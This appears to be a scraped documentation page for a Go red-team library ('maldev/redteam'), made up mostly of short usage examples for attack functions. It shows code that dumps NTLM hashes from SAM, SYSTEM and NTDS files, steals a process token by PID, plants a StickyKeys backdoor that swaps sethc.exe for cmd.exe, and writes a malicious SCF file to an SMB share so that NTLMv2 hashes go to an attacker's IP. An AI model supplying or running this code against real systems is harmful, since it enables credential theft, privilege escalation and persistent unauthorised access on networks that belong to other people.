You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This functions use gosecretsdump which is really fast and can NTLM dump hashes with a lot of config options
package main
import (
"fmt""github.com/D3Ext/maldev/redteam"
)
funcmain(){
// First way (using SAM and SYSTEM)hashes1, err:=redteam.DumpSamHashes("C:\\path\\to\\system", "C:\\path\\to\\sam")
iferr!=nil {
log.Fatal(err)
}
fmt.Println(hashes1)
// Second way (using NTDS and SYSTEM)hashes2, err:=redteam.DumpNtdsHashes("C:\\path\\to\\system", "C:\\path\\to\\ntds")
iferr!=nil {
log.Fatal(err)
}
fmt.Println(hashes2)
// Third way (automated mode)hashes3, err:=redteam.AutoHashDump()
iferr!=nil {
log.Fatal(err)
}
fmt.Println(hashes3)
}
Steal process token (impersonation)
package main
import (
"log""github.com/D3Ext/maldev/redteam"
)
funcmain(){
pid:=1234// Set PID to stealtoken, err:=redteam.Impersonate(pid) // Returns error if user doesn't have privilegesiferr!=nil {
log.Fatal(err)
}
}
StickyKeys backdoor
This function replaces the sethc.exe binary with a cmd.exe so when you press SHIFT 3 times it launches a terminal as Administrator. It also creates a backup of the sethc.exe binary so you also can use the RevertStickyKeys()
With this function you can create a malicious SCF file to obtain NTLMv2 hashes once a user opens the SMB share
package main
import (
"log""github.com/D3Ext/maldev/redteam"
)
funcmain(){
path:="C:\\Path\\To\\Smb\\Share\\malicious.scf"// Path with filename where SCF file will be storedip:="192.168.1.37"// Attacker ip, if a responder is running you will receive NTLMv2 hasheserr:=redteam.CreateScf(path, ip)
iferr!=nil {
log.Fatal(err)
}
}